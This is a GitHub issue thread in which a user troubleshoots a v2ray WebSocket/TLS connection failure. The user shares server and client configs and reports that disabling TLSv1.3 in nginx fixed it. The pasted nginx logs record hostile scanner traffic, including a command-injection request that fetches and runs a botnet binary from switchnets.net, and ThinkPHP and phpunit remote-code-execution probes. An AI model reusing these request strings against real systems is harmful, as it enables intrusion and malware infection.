### ISSUE TITLE
Client Error: An existing connection was forcibly closed by the remote host

### ISSUE THREAD

**Issue by sincos2007** [v2ray/v2ray-core#2398]
1) 你正在使用哪个版本的 V2Ray？（如果服务器和客户端使用了不同版本，请注明）
v2rayN client: v2.29 
server: I do not kow, I remember that I installed it by:
bash <(curl -L -s https://install.direct/go.sh) 2 days ago, and today is 2020-03-31

2) 你的使用场景是什么？比如使用 Chrome 通过 Socks/VMess 代理观看 YouTube 视频。
Open google by Firefox

3) 你看到的不正常的现象是什么？（请描述具体现象，比如访问超时，TLS 证书错误等）

I can not open Google by Firefox. In console window of v2rayN: keep printing error:

An existing connection was forcibly closed by the remote host. v2ray.com/core/transport/internet/websocket: failed to dial WebSocket > v2ray.com/core/transport/internet/websocket: failed to dial to (wss://my domain name of my VPS server/pojfpoiehrgipwgfedhpotjknopffapqpejriwehgsfehgfrjphognmxspvgsojouegefdnhptihosug):  > read tcp 192.168.8.102:63409-><IP of server>:443

4) 你期待看到的正确表现是怎样的？

Open Google successfully without error messages

5) 请附上你的配置（提交 Issue 前请隐藏服务器端IP地址）。

服务器端配置:

```javascript

{
	"inbounds": [
		{
			"protocol": "vmess",
			"listen": "127.0.0.1",
			"port": 51337,
			"settings": {
				"clients": [
					{
						"id": "21e45a75-5990-44ae-8d48-1fc866ea7560",
						"alterId": 0
					}
				]
			},
			"streamSettings": {
				"network": "ws",
				"wsSettings": {
					"path": "/pojfpoiehrgipwgfedhpotjknopffapqpejriwehgsfehgfrjphognmxspvgsojouegefdnhptihosug"
				}
			}
		}
	],
	"outbounds": [
		{
			"protocol": "freedom",
			"settings": {},
			"domainStrategy": "UseIP"
		},
		{
			"protocol": "blackhole",
			"settings": {},
			"tag": "blocked"
		}
	],
	"dns": {
		"servers": [
			"https+local://1.1.1.1/dns-query",
			"https+local://dns.google/dns-query",
			"localhost"
		]
	},
	"routing": {
		"rules": [
			{
				"type": "field",
				"ip": [
					"geoip:private"
				],
				"outboundTag": "blocked"
			}
		]
	},
	"log": {
		"loglevel": "warning",
		"access": "/var/log/v2ray/access.log",
		"error": "/var/log/v2ray/error.log"
	}
}

```

客户端配置:

```javascript
{
  "log": {
    "access": "",
    "error": "",
    "loglevel": "warning"
  },
  "inbounds": [
    {
      "port": 10808,
      "listen": "127.0.0.1",
      "protocol": "socks",
      "sniffing": {
        "enabled": true,
        "destOverride": [
          "http",
          "tls"
        ]
      },
      "settings": {
        "auth": "noauth",
        "udp": true,
        "ip": null,
        "clients": null
      },
      "streamSettings": null
    }
  ],
  "outbounds": [
    {
      "tag": "proxy",
      "protocol": "vmess",
      "settings": {
        "vnext": [
          {
            "address": "<domain name of my VPS server>",
            "port": 443,
            "users": [
              {
                "id": "21e45a75-5990-44ae-8d48-1fc866ea7560",
                "alterId": 0,
                "email": "t@t.tt",
                "security": "auto"
              }
            ]
          }
        ],
        "servers": null,
        "response": null
      },
      "streamSettings": {
        "network": "ws",
        "security": "tls",
        "tlsSettings": {
          "allowInsecure": false,
          "serverName": null
        },
        "tcpSettings": null,
        "kcpSettings": null,
        "wsSettings": {
          "connectionReuse": true,
          "path": "/pojfpoiehrgipwgfedhpotjknopffapqpejriwehgsfehgfrjphognmxspvgsojouegefdnhptihosug",
          "headers": null
        },
        "httpSettings": null,
        "quicSettings": null
      },
      "mux": {
        "enabled": true
      }
    },
    {
      "tag": "direct",
      "protocol": "freedom",
      "settings": {
        "vnext": null,
        "servers": null,
        "response": null
      },
      "streamSettings": null,
      "mux": null
    },
    {
      "tag": "block",
      "protocol": "blackhole",
      "settings": {
        "vnext": null,
        "servers": null,
        "response": {
          "type": "http"
        }
      },
      "streamSettings": null,
      "mux": null
    }
  ],
  "dns": null,
  "routing": {
    "domainStrategy": "IPIfNonMatch",
    "rules": []
  }
}
```

6)  请附上出错时软件输出的错误日志。在 Linux 中，日志通常在 `/var/log/v2ray/error.log` 文件中。

服务器端错误日志:

```javascript
2020/03/30 09:27:35 [Warning] v2ray.com/core: V2Ray 4.23.1 started
2020/03/31 09:37:36 [Warning] v2ray.com/core: V2Ray 4.23.1 started
2020/03/31 09:38:05 [Warning] v2ray.com/core: V2Ray 4.23.1 started
```

客户端错误日志:

```javascript
    不知道在哪里
```

7) 请附上访问日志。在 Linux 中，日志通常在 `/var/log/v2ray/access.log` 文件中。

```javascript
    An empty file
```

8) 其它相关的配置文件（如 Nginx）和相关日志。

access.log:

176.213.40.0 - - [30/Mar/2020:10:04:22 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
54.169.100.113 - - [30/Mar/2020:10:07:32 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 zgrab/0.x" "-"
147.91.212.250 - - [30/Mar/2020:10:47:08 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
220.135.70.137 - - [30/Mar/2020:11:10:33 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
162.243.130.220 - - [30/Mar/2020:11:58:17 +0000] "GET /portal/redlion HTTP/1.1" 404 3650 "-" "Mozilla/5.0 zgrab/0.x" "-"
61.219.11.153 - - [30/Mar/2020:13:00:20 +0000] "\x01\x00\x00\x00" 400 157 "-" "-" "-"
171.67.70.85 - - [30/Mar/2020:15:17:15 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 zgrab/0.x" "-"
96.72.189.145 - - [30/Mar/2020:15:25:29 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 157 "-" "polaris botnet" "-"
106.52.178.254 - - [30/Mar/2020:15:30:59 +0000] "GET /TP/public/index.php HTTP/1.1" 404 3650 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "-"
106.52.178.254 - - [30/Mar/2020:15:31:00 +0000] "GET /TP/index.php HTTP/1.1" 404 3650 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "-"
106.52.178.254 - - [30/Mar/2020:15:31:03 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 3650 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "-"
106.52.178.254 - - [30/Mar/2020:15:31:04 +0000] "GET /html/public/index.php HTTP/1.1" 404 3650 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "-"
106.52.178.254 - - [30/Mar/2020:15:31:05 +0000] "GET /public/index.php HTTP/1.1" 404 3650 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "-"
106.52.178.254 - - [30/Mar/2020:15:31:06 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 3650 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "-"
106.52.178.254 - - [30/Mar/2020:15:31:08 +0000] "GET /elrekt.php HTTP/1.1" 404 3650 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "-"
106.52.178.254 - - [30/Mar/2020:15:31:09 +0000] "GET /index.php HTTP/1.1" 404 3650 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "-"
106.52.178.254 - - [30/Mar/2020:15:31:11 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "-"
169.197.108.22 - - [30/Mar/2020:17:14:19 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-"
177.228.218.34 - - [30/Mar/2020:17:28:58 +0000] "GET / HTTP/1.1" 400 157 "-" "-" "-"
176.98.219.170 - - [30/Mar/2020:18:05:45 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
167.99.40.21 - - [30/Mar/2020:18:40:28 +0000] "GET / HTTP/1.0" 200 4833 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" "-"
167.99.40.21 - - [30/Mar/2020:18:40:31 +0000] "GET / HTTP/1.0" 200 4833 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" "-"
167.99.40.21 - - [30/Mar/2020:18:40:35 +0000] "GET / HTTP/1.0" 200 4833 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" "-"
162.243.131.176 - - [30/Mar/2020:18:41:10 +0000] "GET /manager/html HTTP/1.1" 404 3650 "-" "Mozilla/5.0 zgrab/0.x" "-"
176.215.50.47 - - [30/Mar/2020:18:54:24 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
45.125.66.21 - - [30/Mar/2020:20:27:10 +0000] "GET / HTTP/1.1" 200 4833 "-" "-" "-"
162.243.128.104 - - [30/Mar/2020:20:33:16 +0000] "GET /manager/html HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x" "-"
68.183.195.23 - - [30/Mar/2020:20:35:29 +0000] "GET /index.php HTTP/1.1" 404 3650 "-" "-" "-"
45.237.157.17 - - [30/Mar/2020:20:56:07 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
185.153.199.211 - - [30/Mar/2020:20:57:31 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 157 "-" "-" "-"
185.153.199.211 - - [30/Mar/2020:21:03:08 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 157 "-" "-" "-"
185.153.199.211 - - [30/Mar/2020:21:08:57 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 157 "-" "-" "-"
171.67.70.85 - - [30/Mar/2020:21:18:52 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 zgrab/0.x" "-"
192.241.237.194 - - [30/Mar/2020:21:24:37 +0000] "GET /hudson HTTP/1.1" 404 3650 "-" "Mozilla/5.0 zgrab/0.x" "-"
66.240.205.34 - - [30/Mar/2020:22:45:58 +0000] "H\x00\x00\x00tj\xA8\x9E#D\x98+\xCA\xF0\xA7\xBBl\xC5\x19\xD7\x8D\xB6\x18\xEDJ\x1En\xC1\xF9xu[l\xF0E\x1D-j\xEC\xD4xL\xC9r\xC9\x15\x10u\xE0%\x86Rtg\x05fv\x86]%\xCC\x80\x0C\xE8\xCF\xAE\x00\xB5\xC0f\xC8\x8DD\xC5\x09\xF4" 400 157 "-" "-" "-"
103.61.103.126 - - [30/Mar/2020:22:58:03 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
209.17.97.2 - - [30/Mar/2020:23:21:40 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)" "-"
209.97.190.223 - - [31/Mar/2020:00:13:15 +0000] "GET / HTTP/1.0" 200 4833 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" "-"
209.97.190.223 - - [31/Mar/2020:00:13:19 +0000] "GET / HTTP/1.0" 200 4833 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" "-"
61.219.11.153 - - [31/Mar/2020:00:46:29 +0000] "\x01\x00\x00\x00" 400 157 "-" "-" "-"
83.97.20.33 - - [31/Mar/2020:00:59:29 +0000] "l\x00\x0B\x00\x00\x00\x00\x00\x00\x00\x00\x00" 400 157 "-" "-" "-"
192.241.237.216 - - [31/Mar/2020:01:21:12 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 zgrab/0.x" "-"
195.142.115.111 - - [31/Mar/2020:01:32:41 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 zgrab/0.x" "-"
94.100.223.137 - - [31/Mar/2020:02:04:49 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
171.67.70.85 - - [31/Mar/2020:03:19:00 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 zgrab/0.x" "-"
92.118.161.49 - - [31/Mar/2020:03:41:18 +0000] "GET / HTTP/1.0" 200 4833 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-"
128.14.209.242 - - [31/Mar/2020:04:13:49 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-"
62.210.5.253 - - [31/Mar/2020:04:57:36 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0" "-"
94.140.114.53 - - [31/Mar/2020:05:17:02 +0000] "GET / HTTP/1.0" 200 4833 "-" "Pandalytics/1.0 (https://domainsbot.com/pandalytics/)" "-"
83.97.20.189 - - [31/Mar/2020:05:17:30 +0000] "aaaabbbbccccdddd\x00\x00\x00\x00\x00\x00\x00\x00,k\x00\x00\x04\x00\x00\x00\x92\x10" 400 157 "-" "-" "-"
23.225.172.10 - - [31/Mar/2020:05:22:25 +0000] "CONNECT ip.ws.126.net:443 HTTP/1.1" 400 157 "-" "-" "-"
95.81.216.131 - - [31/Mar/2020:05:42:41 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
41.220.242.62 - - [31/Mar/2020:05:48:19 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
23.225.172.10 - - [31/Mar/2020:07:19:09 +0000] "CONNECT ip.ws.126.net:443 HTTP/1.1" 400 157 "-" "-" "-"
23.225.172.10 - - [31/Mar/2020:07:19:53 +0000] "CONNECT ip.ws.126.net:443 HTTP/1.1" 400 157 "-" "-" "-"
173.212.218.126 - - [31/Mar/2020:07:22:08 +0000] "GET / HTTP/1.0" 200 4833 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" "-"
173.212.218.126 - - [31/Mar/2020:07:22:12 +0000] "GET / HTTP/1.0" 200 4833 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" "-"
195.154.211.33 - - [31/Mar/2020:08:29:54 +0000] "GET / HTTP/1.0" 200 4833 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" "-"
201.110.54.34 - - [31/Mar/2020:08:45:53 +0000] "GET / HTTP/1.1" 400 157 "-" "-" "-"
198.108.66.144 - - [31/Mar/2020:08:49:19 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 zgrab/0.x" "-"
45.143.221.50 - - [31/Mar/2020:09:06:12 +0000] "GET / HTTP/1.1" 400 255 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1062.12.1.el7.x86_64" "-"
45.143.221.50 - - [31/Mar/2020:09:06:12 +0000] "GET / HTTP/1.1" 200 4833 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1062.12.1.el7.x86_64" "-"
45.143.221.50 - - [31/Mar/2020:09:06:14 +0000] "\x16\x03\x01\x00\xFC\x01\x00\x00\xF8\x03\x03\x8C3>\xBF\x13\x8F0\xDF\x0E\xD3~H$R'\x15\x95AX0\x17\xEC\xDD\x00f=A.tr\x86\xC7\x00\x00\x8C\xC00\xC0,\xC02\xC0.\xC0/\xC0+\xC01\xC0-\x00\xA5\x00\xA3\x00\xA1\x00\x9F\x00\xA4\x00\xA2\x00\xA0\x00\x9E\xC0(\xC0$\xC0\x14\xC0" 400 157 "-" "-" "-"
171.67.70.85 - - [31/Mar/2020:09:18:47 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 zgrab/0.x" "-"
23.225.172.10 - - [31/Mar/2020:09:23:04 +0000] "CONNECT ip.ws.126.net:443 HTTP/1.1" 400 157 "-" "-" "-"
197.248.236.174 - - [31/Mar/2020:09:42:57 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
187.110.208.58 - - [31/Mar/2020:10:13:59 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
37.53.177.130 - - [31/Mar/2020:10:40:49 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
61.219.11.153 - - [31/Mar/2020:10:55:30 +0000] "GET / HTTP/1.1" 400 157 "-" "-" "-"
51.68.120.183 - - [31/Mar/2020:11:14:10 +0000] "GET / HTTP/1.0" 200 4833 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" "-"
51.68.120.183 - - [31/Mar/2020:11:14:17 +0000] "GET / HTTP/1.0" 200 4833 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" "-"
5.101.0.209 - - [31/Mar/2020:11:28:05 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 3650 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
94.230.107.163 - - [31/Mar/2020:11:30:14 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
5.101.0.209 - - [31/Mar/2020:11:30:25 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
5.101.0.209 - - [31/Mar/2020:11:30:26 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
5.101.0.209 - - [31/Mar/2020:11:31:33 +0000] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 3650 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
91.126.217.116 - - [31/Mar/2020:12:18:33 +0000] "GET /wp-login.php HTTP/1.1" 404 3650 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" "-"
162.243.130.216 - - [31/Mar/2020:12:23:53 +0000] "GET /portal/redlion HTTP/1.1" 404 3650 "-" "Mozilla/5.0 zgrab/0.x" "-"
5.101.0.209 - - [31/Mar/2020:13:03:11 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 3650 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
62.173.147.13 - - [31/Mar/2020:13:07:41 +0000] "GET / HTTP/1.1" 200 4833 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" "-"
78.232.115.76 - - [31/Mar/2020:13:08:19 +0000] "GET / HTTP/1.1" 200 4833 "-" "-" "-"
5.101.0.209 - - [31/Mar/2020:13:17:20 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 3650 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
85.33.39.225 - - [31/Mar/2020:13:25:58 +0000] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1" 400 157 "-" "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)" "-"

error.log:

2020/03/30 11:58:17 [error] 4762#0: *10 open() "/usr/share/nginx/html/portal/redlion" failed (2: No such file or directory), client: 162.243.130.220, server: _, request: "GET /portal/redlion HTTP/1.1", host: "<server IP>"
2020/03/30 15:30:59 [error] 4762#0: *17 open() "/usr/share/nginx/html/TP/public/index.php" failed (2: No such file or directory), client: 106.52.178.254, server: _, request: "GET /TP/public/index.php HTTP/1.1", host: "<server IP>"
2020/03/30 15:31:00 [error] 4762#0: *18 open() "/usr/share/nginx/html/TP/index.php" failed (2: No such file or directory), client: 106.52.178.254, server: _, request: "GET /TP/index.php HTTP/1.1", host: "<server IP>"
2020/03/30 15:31:03 [error] 4762#0: *19 open() "/usr/share/nginx/html/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 106.52.178.254, server: _, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "<server IP>"
2020/03/30 15:31:04 [error] 4762#0: *20 open() "/usr/share/nginx/html/html/public/index.php" failed (2: No such file or directory), client: 106.52.178.254, server: _, request: "GET /html/public/index.php HTTP/1.1", host: "<server IP>"
2020/03/30 15:31:05 [error] 4762#0: *21 open() "/usr/share/nginx/html/public/index.php" failed (2: No such file or directory), client: 106.52.178.254, server: _, request: "GET /public/index.php HTTP/1.1", host: "<server IP>"
2020/03/30 15:31:06 [error] 4762#0: *22 open() "/usr/share/nginx/html/TP/html/public/index.php" failed (2: No such file or directory), client: 106.52.178.254, server: _, request: "GET /TP/html/public/index.php HTTP/1.1", host: "<server IP>"
2020/03/30 15:31:08 [error] 4762#0: *23 open() "/usr/share/nginx/html/elrekt.php" failed (2: No such file or directory), client: 106.52.178.254, server: _, request: "GET /elrekt.php HTTP/1.1", host: "<server IP>"
2020/03/30 15:31:09 [error] 4762#0: *24 open() "/usr/share/nginx/html/index.php" failed (2: No such file or directory), client: 106.52.178.254, server: _, request: "GET /index.php HTTP/1.1", host: "<server IP>"
2020/03/30 18:41:10 [error] 4762#0: *34 open() "/usr/share/nginx/html/manager/html" failed (2: No such file or directory), client: 162.243.131.176, server: _, request: "GET /manager/html HTTP/1.1", host: "<server IP>"
2020/03/30 20:35:29 [error] 4762#0: *40 open() "/usr/share/nginx/html/index.php" failed (2: No such file or directory), client: 68.183.195.23, server: _, request: "GET /index.php HTTP/1.1", host: "<server IP>"
2020/03/30 21:24:37 [error] 4762#0: *46 open() "/usr/share/nginx/html/hudson" failed (2: No such file or directory), client: 192.241.237.194, server: _, request: "GET /hudson HTTP/1.1", host: "<server IP>"
2020/03/31 11:28:05 [error] 30042#0: *130 open() "/usr/share/nginx/html/solr/admin/info/system" failed (2: No such file or directory), client: 5.101.0.209, server: _, request: "GET /solr/admin/info/system?wt=json HTTP/1.1", host: "<server IP>:80"
2020/03/31 11:31:33 [error] 30042#0: *134 open() "/usr/share/nginx/html/index.php" failed (2: No such file or directory), client: 5.101.0.209, server: _, request: "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1", host: "<server IP>:80"
2020/03/31 12:18:33 [error] 30042#0: *136 open() "/usr/share/nginx/html/wp-login.php" failed (2: No such file or directory), client: 91.126.217.116, server: _, request: "GET /wp-login.php HTTP/1.1", host: "<server domain name>"
2020/03/31 12:23:53 [error] 30042#0: *137 open() "/usr/share/nginx/html/portal/redlion" failed (2: No such file or directory), client: 162.243.130.216, server: _, request: "GET /portal/redlion HTTP/1.1", host: "<server IP>"
2020/03/31 13:03:11 [error] 30042#0: *138 open() "/usr/share/nginx/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.101.0.209, server: _, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "<server IP>:80"
2020/03/31 13:17:20 [error] 30042#0: *142 open() "/usr/share/nginx/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.101.0.209, server: _, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "<server IP>:80"

**Comment by sincos2007** [comment]
我的时间应该没有问题：

```
 timedatectl
      Local time: Wed 2020-04-01 02:44:14 CST
  Universal time: Tue 2020-03-31 18:44:14 UTC
        RTC time: Tue 2020-03-31 18:45:01
       Time zone: UTC (CST, +0800)
     NTP enabled: yes
NTP synchronized: no
 RTC in local TZ: no
      DST active: n/a
```

**Comment by sincos2007** [comment]
我是中国人啊。不好意思，上论坛打英文打习惯了。

**Comment by sincos2007** [comment]
解决了。Nginx设置里面不要用TLSv1.3

**Comment by qq1216300306** [comment]
> 解决了。Nginx设置里面不要用TLSv1.3

怎么解决的呀 求告知感谢
